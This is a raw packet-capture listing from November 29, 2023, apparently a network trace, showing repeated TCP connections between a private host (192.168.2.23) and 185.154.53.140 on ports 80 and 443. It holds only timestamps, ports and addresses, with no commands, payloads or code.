Nov 29, 2023 18:00:00.142299891 CET	52160	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:00.142307997 CET	443	52160	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:00.151717901 CET	52160	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:00.151722908 CET	443	52160	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:00.156898022 CET	443	52160	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:00.156985998 CET	52160	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:00.176625013 CET	52160	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:00.176841021 CET	443	52160	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:00.176892042 CET	52160	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:00.176920891 CET	443	52160	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:00.176970005 CET	52160	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:00.180361986 CET	52160	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:00.221280098 CET	443	52160	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:00.535191059 CET	443	52160	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:00.535326004 CET	52160	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:00.535343885 CET	443	52160	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:00.535382986 CET	52160	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:00.535391092 CET	443	52160	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:00.541003942 CET	52160	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:00.541028023 CET	443	52160	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:01.889400005 CET	51154	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:02.253881931 CET	80	51154	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:02.254192114 CET	51154	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:02.260802031 CET	51154	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:02.624752998 CET	80	51154	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:02.624886036 CET	80	51154	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:02.625071049 CET	80	51154	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:02.625101089 CET	51154	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:02.627068043 CET	51154	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:02.852360010 CET	52164	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:02.852410078 CET	443	52164	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:02.852464914 CET	52164	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:02.855950117 CET	52164	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:02.855976105 CET	443	52164	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:02.991014004 CET	80	51154	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:03.935133934 CET	443	52164	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:03.935425997 CET	52164	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:03.937786102 CET	52164	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:03.937799931 CET	443	52164	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:03.940107107 CET	52164	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:03.940124035 CET	443	52164	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:03.941617012 CET	443	52164	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:03.941679955 CET	52164	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:03.946333885 CET	52164	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:03.946717024 CET	443	52164	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:03.946784973 CET	52164	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:03.946815968 CET	443	52164	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:03.946861029 CET	52164	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:03.948817015 CET	52164	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:03.989267111 CET	443	52164	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:04.303539038 CET	443	52164	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:04.303726912 CET	443	52164	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:04.303795099 CET	52164	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:04.309109926 CET	51158	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:04.309889078 CET	52164	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:04.309910059 CET	443	52164	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:04.671637058 CET	80	51158	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:04.671858072 CET	51158	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:04.674506903 CET	51158	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:04.677401066 CET	51158	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:05.037199020 CET	80	51158	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:05.037219048 CET	80	51158	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:05.037699938 CET	51158	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:05.039880037 CET	51158	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:05.040888071 CET	80	51158	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:05.040957928 CET	51158	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:05.143785954 CET	52168	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:05.143868923 CET	443	52168	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:05.143939972 CET	52168	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:05.145812035 CET	52168	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:05.145848036 CET	443	52168	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:05.402393103 CET	80	51158	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:06.239891052 CET	443	52168	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:06.240211010 CET	52168	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:06.242930889 CET	52168	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:06.242948055 CET	443	52168	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:06.244851112 CET	52168	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:06.244862080 CET	443	52168	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:06.246335030 CET	443	52168	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:06.246385098 CET	52168	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:06.250612974 CET	52168	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:06.250709057 CET	443	52168	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:06.250746965 CET	52168	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:06.250758886 CET	443	52168	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:06.250794888 CET	52168	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:06.252594948 CET	52168	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:06.293289900 CET	443	52168	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:06.614581108 CET	443	52168	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:06.614706039 CET	443	52168	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:06.614753008 CET	52168	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:06.617041111 CET	52168	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:06.617074013 CET	443	52168	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:06.620479107 CET	51162	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:06.983000040 CET	80	51162	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:06.983187914 CET	51162	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:06.985572100 CET	51162	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:06.986979008 CET	51162	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:07.348006964 CET	80	51162	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:07.348088980 CET	80	51162	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:07.348206043 CET	51162	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:07.349442959 CET	80	51162	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:07.350718021 CET	51162	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:07.460818052 CET	52172	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:07.460866928 CET	443	52172	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:07.460927010 CET	52172	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:07.462133884 CET	52172	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:07.462155104 CET	443	52172	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:07.713229895 CET	80	51162	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:08.553028107 CET	443	52172	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:08.553260088 CET	52172	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:08.554688931 CET	52172	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:08.554697990 CET	443	52172	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:08.555890083 CET	52172	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:08.555896997 CET	443	52172	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:08.556787968 CET	443	52172	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:08.556837082 CET	52172	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:08.561115980 CET	52172	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:08.561162949 CET	443	52172	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:08.561197996 CET	52172	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:08.561203957 CET	443	52172	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:08.561229944 CET	52172	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:08.563666105 CET	52172	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:08.609250069 CET	443	52172	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:08.925470114 CET	443	52172	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:08.925559998 CET	443	52172	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:08.925628901 CET	52172	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:08.928458929 CET	52172	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:08.928483009 CET	443	52172	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:08.929294109 CET	51166	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:09.291812897 CET	80	51166	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:09.292131901 CET	51166	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:09.294225931 CET	51166	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:09.656627893 CET	80	51166	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:09.656766891 CET	80	51166	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:09.656863928 CET	51166	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:09.656871080 CET	80	51166	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:09.659039974 CET	51166	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:09.758516073 CET	52176	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:09.758605003 CET	443	52176	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:09.758730888 CET	52176	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:09.760622025 CET	52176	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:09.760651112 CET	443	52176	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:10.021528006 CET	80	51166	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:10.851686954 CET	443	52176	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:10.851876020 CET	52176	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:10.853770018 CET	52176	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:10.853796959 CET	443	52176	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:10.855114937 CET	52176	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:10.855134964 CET	443	52176	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:10.856046915 CET	443	52176	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:10.856152058 CET	52176	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:10.860183001 CET	52176	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:10.860255957 CET	443	52176	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:10.860317945 CET	52176	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:10.860333920 CET	443	52176	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:10.860385895 CET	52176	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:10.862884998 CET	52176	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:10.905255079 CET	443	52176	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:11.224886894 CET	443	52176	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:11.225075006 CET	443	52176	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:11.225078106 CET	52176	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:11.229578018 CET	52176	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:11.229639053 CET	443	52176	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:11.231003046 CET	51170	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:11.587332964 CET	80	51170	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:11.587743044 CET	51170	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:11.590604067 CET	51170	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:11.592051029 CET	51170	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:11.947181940 CET	80	51170	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:11.947338104 CET	80	51170	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:11.947540998 CET	51170	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:11.948441029 CET	80	51170	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:11.949012041 CET	51170	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:12.202748060 CET	52180	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:12.202805042 CET	443	52180	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:12.202918053 CET	52180	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:12.204325914 CET	52180	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:12.204344988 CET	443	52180	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:12.308144093 CET	80	51170	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:13.286163092 CET	443	52180	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:13.286309004 CET	52180	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:13.287978888 CET	52180	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:13.287996054 CET	443	52180	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:13.289145947 CET	52180	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:13.289151907 CET	443	52180	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:13.290261030 CET	443	52180	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:13.290317059 CET	52180	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:13.293935061 CET	52180	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:13.294100046 CET	443	52180	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:13.294260025 CET	52180	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:13.294286966 CET	443	52180	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:13.294334888 CET	52180	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:13.295805931 CET	52180	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:13.337266922 CET	443	52180	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:13.652729034 CET	443	52180	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:13.652868986 CET	443	52180	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:13.652919054 CET	52180	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:13.662379026 CET	51174	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:13.663283110 CET	52180	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:13.663305044 CET	443	52180	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:14.023024082 CET	80	51174	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:14.023242950 CET	51174	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:14.025607109 CET	51174	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:14.027679920 CET	51174	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:14.383690119 CET	80	51174	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:14.383878946 CET	80	51174	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:14.383914948 CET	80	51174	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:14.384042978 CET	51174	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:14.386854887 CET	51174	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:14.489707947 CET	52184	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:14.489772081 CET	443	52184	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:14.489856958 CET	52184	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:14.493213892 CET	52184	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:14.493238926 CET	443	52184	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:14.743891001 CET	80	51174	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:15.596651077 CET	443	52184	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:15.597067118 CET	52184	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:15.600294113 CET	52184	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:15.600326061 CET	443	52184	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:15.602700949 CET	52184	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:15.602715015 CET	443	52184	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:15.604186058 CET	443	52184	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:15.604280949 CET	52184	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:15.616132975 CET	52184	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:15.616314888 CET	443	52184	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:15.616516113 CET	52184	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:15.616573095 CET	443	52184	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:15.616628885 CET	52184	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:15.619739056 CET	52184	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:15.661350012 CET	443	52184	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:15.983911037 CET	443	52184	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:15.984131098 CET	443	52184	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:15.984174013 CET	52184	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:15.986718893 CET	52184	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:15.986772060 CET	443	52184	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:27.996005058 CET	51178	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:27.996978045 CET	51180	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:27.997642994 CET	51182	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.360392094 CET	80	51178	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:28.360452890 CET	51178	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.360971928 CET	80	51180	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:28.361008883 CET	51180	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.361892939 CET	80	51182	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:28.361963034 CET	51182	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.364245892 CET	51178	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.364584923 CET	51180	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.367955923 CET	51178	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.368160009 CET	51182	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.728302956 CET	80	51178	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:28.728324890 CET	80	51178	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:28.728365898 CET	51178	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.728518009 CET	80	51180	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:28.728583097 CET	80	51180	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:28.728646040 CET	51180	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.728648901 CET	80	51180	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:28.731873035 CET	80	51178	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:28.732134104 CET	80	51182	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:28.732320070 CET	80	51182	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:28.732331991 CET	80	51182	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:28.732366085 CET	51182	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.771032095 CET	51180	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.771089077 CET	51182	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.772717953 CET	51178	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.773893118 CET	51180	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.886554003 CET	52192	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.886626005 CET	52194	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.886626959 CET	52196	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.886631966 CET	443	52192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:28.886648893 CET	443	52196	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:28.886651039 CET	443	52194	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:28.886699915 CET	52196	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.886702061 CET	52192	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.886707067 CET	52194	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.904175997 CET	52194	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.904192924 CET	443	52194	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:28.906723976 CET	52196	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.906733036 CET	443	52196	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:28.919473886 CET	52192	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:28.919548035 CET	443	52192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:29.135590076 CET	80	51182	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:29.136575937 CET	80	51178	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:29.137842894 CET	80	51180	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:29.983747005 CET	443	52196	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:29.983834982 CET	52196	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:29.985768080 CET	52196	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:29.985785007 CET	443	52196	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:29.987509966 CET	52196	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:29.987521887 CET	443	52196	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:29.990869999 CET	443	52194	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:29.990938902 CET	52194	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:29.991767883 CET	443	52196	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:29.991832972 CET	52196	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:29.993077993 CET	52194	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:29.993088961 CET	443	52194	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:29.997608900 CET	52194	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:29.997617006 CET	443	52194	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:29.998297930 CET	52196	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:29.998471975 CET	443	52196	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:29.998524904 CET	52196	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:29.998558998 CET	443	52196	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:29.998615026 CET	52196	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.001466990 CET	52196	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.002244949 CET	443	52194	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.002295017 CET	52194	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.007158995 CET	52194	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.007339954 CET	443	52194	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.007385015 CET	52194	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.007411957 CET	443	52194	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.007452011 CET	52194	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.007569075 CET	443	52192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.007633924 CET	52192	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.009648085 CET	52194	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.012285948 CET	52192	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.012299061 CET	443	52192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.013802052 CET	52192	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.013809919 CET	443	52192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.017400026 CET	443	52192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.017458916 CET	52192	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.021234035 CET	52192	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.021421909 CET	443	52192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.021495104 CET	52192	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.021506071 CET	443	52192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.021544933 CET	52192	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.023416042 CET	52192	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.045253992 CET	443	52196	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.053258896 CET	443	52194	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.065274000 CET	443	52192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.356967926 CET	443	52196	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.357053041 CET	52196	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.357086897 CET	443	52196	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.357146978 CET	52196	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.357151985 CET	443	52196	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.361088037 CET	51190	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.361221075 CET	52196	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.361274004 CET	443	52196	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.367851019 CET	443	52194	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.367908001 CET	52194	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.367918968 CET	443	52194	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.367963076 CET	443	52194	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.368002892 CET	52194	443	192.168.2.23	185.154.53.140
